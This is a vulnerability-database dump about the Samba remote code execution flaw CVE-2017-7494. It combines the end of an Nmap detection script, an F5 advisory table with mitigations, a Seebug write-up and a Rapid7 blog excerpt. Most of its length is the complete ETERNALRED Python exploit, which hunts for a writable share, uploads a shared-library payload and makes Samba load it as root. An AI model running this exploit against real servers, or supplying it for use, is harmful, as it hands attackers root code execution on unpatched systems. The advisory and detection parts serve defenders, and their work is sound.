to speed up checks so only hosts with versions that are likely to be\n -- vulnerable are scanned, the second part of the condition allows\n -- the script to run try the exploit on the samba share regardless\n -- of version. 
In this case, the latter is the default.\n elseif (check_version and samba_cve == vulns.STATE.LIKELY_VULN) or not check_version then\n local name, path\n -- vulnerability requires library to be written to share\n name, path = find_writable_shares(host, samba_cve)\n stdnse.debug1(\"Writable share name: %s, Path returned: %s\", name, path)\n\n -- do \"nt pipe support = no\" workaround check, which prevents exploitation\n local ntpipe_enabled = is_ntpipesupport_enabled(host, samba_cve)\n\n -- some patches for samba do not affect version numbers\n -- e.g. 2:4.3.11+dfsg-0ubuntu0.16.04.7\n -- in reality they are not vulnerable\n -- patched versions prevents named pipes containing '/'\n -- more information is available on the patch\n -- https://git.samba.org/?p=samba.git;a=blobdiff;f=source3/rpc_server/srv_pipe.c;h=f79fbe26abff1e3a2b3f3a21480196afc09d13b1;hp=39f5fb49ec3c0e011a5c6ad4b7ac60bcf49af05a;hb=02a76d86db0cbe79fcaf1a500630e24d961fa149;hpb=82bb44dd3b7f42b90494294b32f8413a39cb2030\n -- therefore we need to ascertain if the exploit works\n if name and ntpipe_enabled then\n test_cve2017_7494(host, samba_cve, payloads, name, path)\n\n for i, _ in ipairs(payloads) do\n smb.file_delete(host, name, tostring(i) .. 
FILENAME)\n end\n end\n\n end\n\n return report:make_output(samba_cve)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-04-30T18:21:00", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 
4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n**BIG-IP LTM**\n\nIf the BIG-IP LTM system is in the network path between clients and Samba servers, use packet filters to block SMB access (tcp/445) from untrusted client IPs and networks.\n\n**BIG-IP AFM**\n\nIf the BIG-IP AFM system is in the network path between clients and Samba servers, use BIG-IP AFM policies to block SMB access (tcp/445) from untrusted client IPs and networks.\n\n**BIG-IP APM**\n\nThe BIG-IP APM system may allow access to SMB shares over full Virtual Private Network (VPN) connections. 
You may use L4 access control lists (ACLs) to block this access, or permit access only for certain clients.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-05-26T22:08:00", "published": "2017-05-25T20:18:00", "id": "F5:K13551136", "href": "https://support.f5.com/csp/article/K13551136", "title": "Samba remote code execution vulnerability CVE-2017-7494 ", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T11:57:43", "description": "### I. Vulnerability overview\n\n#### 1 Vulnerability profile\n\nSamba is software that implements the SMB protocol on Linux and UNIX systems; many IoT devices also use Samba. On May 24, 2017, Samba released version 4.6.4 to fix a serious remote code execution vulnerability, CVE-2017-7494, which an attacker can exploit to execute arbitrary code on the target server. On May 25, 2017, hdm submitted an exploit (exp) for the vulnerability to Metasploit. On May 25, 2017, OpenWrt released a patch fixing the bug; many IoT devices are also affected by the vulnerability.\n\n#### 2 Exploitation conditions\n\n 1. There are access permissions to a shared directory on the server.\n 2. 
The attacker needs to be able to write a malicious file to the server and to know the file's physical path.\n\n#### 3 Affected versions\n \n \n Samba 3.5+ <4.6.4 <4.5.10 <4.4.14\n \n\n### II. Vulnerability reproduction\n\n#### 1 Verification environment\n\nSamba 4.1.13 Ubuntu 14.04\n\n#### 2 Test results\n\nThe exploit (exp) in Metasploit was used for testing; the results are shown in the following figure.  \n\nAs shown, a shell is returned successfully; the privileges obtained depend on the Samba configuration.\n\n### III. Exploitation\n\nAn attacker can upload a malicious file to the server in various ways and then have Samba load the malicious file to trigger the vulnerability. In practice, an attacker can upload malicious files to the server as a low-privilege user and use the vulnerability to gain the privileges of the Samba service; the privileges obtained depend on the Samba configuration, so running the Samba service as the root user is not recommended.\n", "published": "2017-05-25T00:00:00", "type": "seebug", "title": "Samba remote code execution vulnerability(CVE-2017-7494)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93139", "id": "SSV:93139", "sourceData": "\n #! 
/usr/bin/env python\r\n# Title : ETERNALRED \r\n# Date: 05/24/2017\r\n# Exploit Author: steelo <knownsteelo@gmail.com>\r\n# Vendor Homepage: https://www.samba.org\r\n# Samba 3.5.0 - 4.5.4/4.5.10/4.4.14\r\n# CVE-2017-7494\r\n\r\n\r\nimport argparse\r\nimport os.path\r\nimport sys\r\nimport tempfile\r\nimport time\r\nfrom smb.SMBConnection import SMBConnection\r\nfrom smb import smb_structs\r\nfrom smb.base import _PendingRequest\r\nfrom smb.smb2_structs import *\r\nfrom smb.base import *\r\n\r\n\r\nclass SharedDevice2(SharedDevice):\r\n def __init__(self, type, name, comments, path, password):\r\n super().__init__(type, name, comments)\r\n self.path = path\r\n self.password = password\r\n\r\nclass SMBConnectionEx(SMBConnection):\r\n def __init__(self, username, password, my_name, remote_name, domain=\"\", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):\r\n super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)\r\n\r\n\r\n def hook_listShares(self):\r\n self._listShares = self.listSharesEx\r\n\r\n def hook_retrieveFile(self):\r\n self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix\r\n\r\n # This is maily the original listShares but request a higher level of info\r\n def listSharesEx(self, callback, errback, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n expiry_time = time.time() + timeout\r\n path = 'IPC$'\r\n messages_history = [ ]\r\n\r\n def connectSrvSvc(tid):\r\n m = SMB2Message(SMB2CreateRequest('srvsvc',\r\n file_attributes = 0,\r\n access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,\r\n share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\r\n oplock = SMB2_OPLOCK_LEVEL_NONE,\r\n impersonation = SEC_IMPERSONATE,\r\n create_options = FILE_NON_DIRECTORY_FILE | 
FILE_OPEN_NO_RECALL,\r\n create_disp = FILE_OPEN))\r\n\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)\r\n messages_history.append(m)\r\n\r\n def connectSrvSvcCB(create_message, **kwargs):\r\n messages_history.append(create_message)\r\n if create_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n # The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 0b 03 10 00 00 00 74 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<I', call_id) + \\\r\n binascii.unhexlify(b\"\"\"\r\nb8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00\r\nc8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88\r\n03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00\r\n2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b\r\n70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00\r\n2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00\r\n01 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))\r\n m.tid = create_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)\r\n messages_history.append(m)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))\r\n\r\n def rpcBindCB(trans_message, **kwargs):\r\n messages_history.append(trans_message)\r\n if trans_message.status == 0:\r\n m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))\r\n m.tid = trans_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, 
errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')\r\n\r\n def rpcReadCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n call_id = self._getNextRPCCallID()\r\n\r\n padding = b''\r\n remote_name = '\\\\\\\\' + self.remote_name\r\n server_len = len(remote_name) + 1\r\n server_bytes_len = server_len * 2\r\n if server_len % 2 != 0:\r\n padding = b'\\0\\0'\r\n server_bytes_len += 2\r\n\r\n # The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n # If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream\r\n data_bytes = \\\r\n binascii.unhexlify(b\"\"\"05 00 00 03 10 00 00 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \\\r\n binascii.unhexlify(b\"\"\"4c 00 00 00 00 00 0f 00 00 00 02 00\"\"\".replace(b' ', b'')) + \\\r\n struct.pack('<III', server_len, 0, server_len) + \\\r\n (remote_name + '\\0').encode('UTF-16LE') + padding + \\\r\n binascii.unhexlify(b\"\"\"\r\n02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00\r\n00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00\r\n\"\"\".replace(b' ', b'').replace(b'\\n', b''))\r\n m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))\r\n m.tid = read_message.tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n messages_history.append(m)\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')\r\n\r\n def listShareResultsCB(result_message, **kwargs):\r\n messages_history.append(result_message)\r\n if result_message.status == 0:\r\n # 
The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.\r\n data_bytes = result_message.payload.out_data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)\r\n else:\r\n decodeResults(result_message.tid, kwargs['fid'], data_bytes)\r\n elif result_message.status == 0x0103: # STATUS_PENDING\r\n self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])\r\n else:\r\n closeFid(result_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def decodeResults(tid, fid, data_bytes):\r\n shares_count = struct.unpack('<I', data_bytes[36:40])[0]\r\n results = [ ] # A list of SharedDevice2 instances\r\n offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants\r\n for i in range(0, shares_count):\r\n results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))\r\n offset += 12\r\n\r\n for i in range(0, shares_count):\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += 
(length * 2)\r\n\r\n max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])\r\n offset += 12\r\n results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')\r\n\r\n if length % 2 != 0:\r\n offset += (length * 2 + 2)\r\n else:\r\n offset += (length * 2)\r\n\r\n\r\n closeFid(tid, fid)\r\n callback(results)\r\n\r\n def sendReadRequest(tid, fid, data_bytes):\r\n read_count = min(4280, self.max_read_size)\r\n m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,\r\n fid = fid, data_bytes = data_bytes)\r\n\r\n def readCB(read_message, **kwargs):\r\n messages_history.append(read_message)\r\n if read_message.status == 0:\r\n data_len = read_message.payload.data_length\r\n data_bytes = read_message.payload.data\r\n\r\n if data_bytes[3] & 0x02 == 0:\r\n sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])\r\n else:\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))\r\n\r\n def closeFid(tid, fid, results = None, error = None):\r\n m = SMB2Message(SMB2CloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)\r\n messages_history.append(m)\r\n\r\n def closeCB(close_message, **kwargs):\r\n if kwargs['results'] is not None:\r\n callback(kwargs['results'])\r\n elif kwargs['error'] is not None:\r\n errback(OperationFailure(kwargs['error'], messages_history))\r\n\r\n if path not in self.connected_trees:\r\n def connectCB(connect_message, **kwargs):\r\n messages_history.append(connect_message)\r\n if 
connect_message.status == 0:\r\n self.connected_trees[path] = connect_message.tid\r\n connectSrvSvc(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))\r\n\r\n m = SMB2Message(SMB2TreeConnectRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), path )))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)\r\n messages_history.append(m)\r\n else:\r\n connectSrvSvc(self.connected_trees[path])\r\n\r\n\r\n # Don't convert to Window style path\r\n def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):\r\n if not self.has_authenticated:\r\n raise NotReadyError('SMB connection not authenticated')\r\n\r\n messages_history = [ ]\r\n\r\n\r\n def sendOpen(tid):\r\n m = SMBMessage(ComOpenAndxRequest(filename = path,\r\n access_mode = 0x0040, # Sharing mode: Deny nothing to others\r\n open_mode = 0x0001, # Failed if file does not exist\r\n search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,\r\n timeout = timeout * 1000))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)\r\n messages_history.append(m)\r\n\r\n def openCB(open_message, **kwargs):\r\n messages_history.append(open_message)\r\n if not open_message.status.hasError:\r\n if max_length == 0:\r\n closeFid(open_message.tid, open_message.payload.fid)\r\n callback(( file_obj, open_message.payload.file_attributes, 0 ))\r\n else:\r\n sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))\r\n\r\n def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):\r\n 
read_count = self.max_raw_size - 2\r\n m = SMBMessage(ComReadAndxRequest(fid = fid,\r\n offset = offset,\r\n max_return_bytes_count = read_count,\r\n min_return_bytes_count = min(0xFFFF, read_count)))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,\r\n read_len = read_len, remaining_len = remaining_len)\r\n\r\n def readCB(read_message, **kwargs):\r\n # To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.\r\n if not read_message.status.hasError:\r\n read_len = kwargs['read_len']\r\n remaining_len = kwargs['remaining_len']\r\n data_len = read_message.payload.data_length\r\n if max_length > 0:\r\n if data_len > remaining_len:\r\n file_obj.write(read_message.payload.data[:remaining_len])\r\n read_len += remaining_len\r\n remaining_len = 0\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n remaining_len -= data_len\r\n read_len += data_len\r\n else:\r\n file_obj.write(read_message.payload.data)\r\n read_len += data_len\r\n\r\n if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):\r\n closeFid(read_message.tid, kwargs['fid'])\r\n callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements\r\n else:\r\n sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)\r\n else:\r\n messages_history.append(read_message)\r\n closeFid(read_message.tid, kwargs['fid'])\r\n errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))\r\n\r\n def closeFid(tid, fid):\r\n m = SMBMessage(ComCloseRequest(fid))\r\n m.tid = tid\r\n self._sendSMBMessage(m)\r\n messages_history.append(m)\r\n\r\n if service_name not in self.connected_trees:\r\n def connectCB(connect_message, 
**kwargs):\r\n messages_history.append(connect_message)\r\n if not connect_message.status.hasError:\r\n self.connected_trees[service_name] = connect_message.tid\r\n sendOpen(connect_message.tid)\r\n else:\r\n errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))\r\n\r\n m = SMBMessage(ComTreeConnectAndxRequest(r'\\\\%s\\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))\r\n self._sendSMBMessage(m)\r\n self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)\r\n messages_history.append(m)\r\n else:\r\n sendOpen(self.connected_trees[service_name])\r\n\r\ndef get_connection(user, password, server, port, force_smb1=False):\r\n if force_smb1:\r\n smb_structs.SUPPORT_SMB2 = False\r\n\r\n conn = SMBConnectionEx(user, password, \"\", \"server\")\r\n assert conn.connect(server, port)\r\n return conn\r\n\r\ndef get_share_info(conn):\r\n conn.hook_listShares()\r\n return conn.listShares()\r\n\r\ndef find_writeable_share(conn, shares):\r\n print(\"[+] Searching for writable share\")\r\n filename = \"red\"\r\n test_file = tempfile.TemporaryFile()\r\n for share in shares:\r\n try:\r\n # If it's not writeable this will throw\r\n conn.storeFile(share.name, filename, test_file)\r\n conn.deleteFiles(share.name, filename)\r\n print(\"[+] Found writeable share: \" + share.name)\r\n return share\r\n except:\r\n pass\r\n\r\n return None\r\n\r\ndef write_payload(conn, share, payload, payload_name):\r\n with open(payload, \"rb\") as fin:\r\n conn.storeFile(share.name, payload_name, fin)\r\n\r\n return True\r\n\r\ndef convert_share_path(share):\r\n path = share.path[2:]\r\n path = path.replace(\"\\\\\", \"/\")\r\n return path\r\n\r\ndef load_payload(user, password, server, port, fullpath):\r\n conn = get_connection(user, password, server, port, force_smb1 = True)\r\n conn.hook_retrieveFile()\r\n\r\n print(\"[+] Attempting to 
load payload\")\r\n temp_file = tempfile.TemporaryFile()\r\n\r\n try:\r\n conn.retrieveFile(\"IPC$\", \"\\\\\\\\PIPE\\\\\" + fullpath, temp_file)\r\n except:\r\n pass\r\n\r\n return\r\n\r\ndef drop_payload(user, password, server, port, payload):\r\n payload_name = \"charizard\"\r\n\r\n conn = get_connection(user, password, server, port)\r\n shares = get_share_info(conn)\r\n share = find_writeable_share(conn, shares)\r\n\r\n if share is None:\r\n print(\"[!] No writeable shares on \" + server + \" for user: \" + user)\r\n sys.exit(-1)\r\n\r\n if not write_payload(conn, share, payload, payload_name):\r\n print(\"[!] Failed to write payload: \" + str(payload) + \" to server\")\r\n sys.exit(-1)\r\n\r\n conn.close()\r\n\r\n fullpath = convert_share_path(share)\r\n return os.path.join(fullpath, payload_name)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\r\n description= \"\"\"Eternal Red Samba Exploit -- CVE-2017-7494\r\n Causes vulnerable Samba server to load a shared library in root context\r\n Credentials are not required if the server has a guest account\r\n For remote exploit you must have write permissions to at least one share\r\n Eternal Red will scan the Samba server for shares it can write to\r\n It will also determine the fullpath of the remote share\r\n\r\n For local exploit provide the full path to your shared library to load\r\n\r\n Your shared library should look something like this\r\n\r\n extern bool change_to_root_user(void);\r\n int samba_init_module(void)\r\n {\r\n change_to_root_user();\r\n /* Do what thou wilt */\r\n }\r\n \"\"\")\r\n parser.add_argument(\"payload\", help=\"path to shared library to load\", type=str)\r\n parser.add_argument(\"server\", help=\"Server to target\", type=str)\r\n parser.add_argument(\"-p\", \"--port\", help=\"Port to use defaults to 445\", type=int)\r\n parser.add_argument(\"-u\", \"--username\", help=\"Username to connect as defaults to nobody\", 
type=str)\r\n parser.add_argument(\"--password\", help=\"Password for user default is empty\", type=str)\r\n parser.add_argument(\"--local\", help=\"Perform local attack. Payload should be fullpath!\", type=bool)\r\n args = parser.parse_args()\r\n\r\n if not os.path.isfile(args.payload):\r\n print(\"[!] Unable to open: \" + args.payload)\r\n sys.exit(-1)\r\n\r\n port = 445\r\n user = \"nobody\"\r\n password = \"\"\r\n fullpath = \"\"\r\n\r\n if args.port:\r\n port = args.port\r\n if args.username:\r\n user = args.username\r\n if args.password:\r\n password = args.password\r\n\r\n if args.local:\r\n fullpath = args.payload\r\n else:\r\n fullpath = drop_payload(user, password, args.server, port, args.payload)\r\n\r\n load_payload(user, password, args.server, port, fullpath)\r\n\r\nif __name__ == \"__main__\":\r\n main()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93139", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-05-27T03:53:29", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "<!-- [DocumentBodyStart:be7d6c8c-369f-4dc9-8d63-ac0622dfbc33] --><div class=\"jive-rendered-content\"><p><span style=\"color: black;\">With the scent of scorched internet still lingering in the air from the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=http%3A%2F%2Fcommunity.rapid7.com%2Fcommunity%2Finfosec%2Fblog%2F2017%2F05%2F12%2Fwanna-decryptor-wncry-ransomware-explained\" rel=\"nofollow\" target=\"_blank\">WannaCry Ransomworm</a></span><span style=\"color: black;\">, today we see a new scary-and-potentially-incendiary bug hitting the twitter news. The vulnerability - CVE-2017-7494 - affects versions 3.5 (released March 1, 2010) and onwards of Samba, the defacto standard for providing Windows-based file and print services on Unix and Linux systems. 
Check out <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.samba.org%2Fsamba%2Fsecurity%2FCVE-2017-7494.html\" rel=\"nofollow\" target=\"_blank\">Samba's advisory</a></span><span style=\"color: black;\"> for more details. </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">We strongly recommend that security and IT teams take immediate action to protect themselves.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2></h2><h2>Who is affected?</h2><p>Many home and corporate network storage systems run Samba and it is frequently installed by default on many Linux systems, making it possible that some users are running Samba without realizing it. Given how easy it is to enable Samba on Linux endpoints, even devices requiring it to be manually enabled will not necessarily be in the clear.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">Samba makes it possible for Unix and Linux systems to share files the same way Windows does. While the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations. These obstacles will most likely present themselves in situations where devices are unmanaged by typical patch deployment solutions or don’t allow OS-level patching by the user. As a result, we believe those systems may be likely conduits into business networks.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2></h2><h2>How bad is it?</h2><p>The internet is not on fire yet, but there’s a lot of potential for it to get pretty nasty. 
If there is a vulnerable version of Samba running on a device, and a malicious actor has access to upload files to that machine, exploitation is trivial.</p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><span style=\"color: black;\">In a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fsonar.labs.rapid7.com%2F\" rel=\"nofollow\" target=\"_blank\">Project Sonar</a></span><span style=\"color: black;\"> scan run today, Rapid7 Labs discovered <strong>more than 104,000 internet-exposed endpoints that appear to be running vulnerable versions of Samba on port 445.</strong> Of those, almost 90% (92,570) are running versions for which there is currently no direct patch available. In other </span><span style=\"color: black;\">words, “We're way beyond the boundary of the Pride Lands.” (sorry - we promise that’s the last Lion King reference. Maybe.) </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7892-67041/Samba+445+major_minor_vulnerable_version_counts_updated.png\"><img alt=\"Samba 445 major_minor_vulnerable_version_counts_updated.png\" class=\"image-1 jive-image\" height=\"524\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7892-67041/1600-524/Samba+445+major_minor_vulnerable_version_counts_updated.png\" style=\"width: 620px; height: 204px;\" width=\"1600\"/></a></p><p><span style=\"color: black;\">We’ve been seeing a significant increase in malicious traffic to port 445 since May 19th; however, the recency of the WannaCry vulnerability makes it difficult for us to attribute this directly to the Samba vulnerability. 
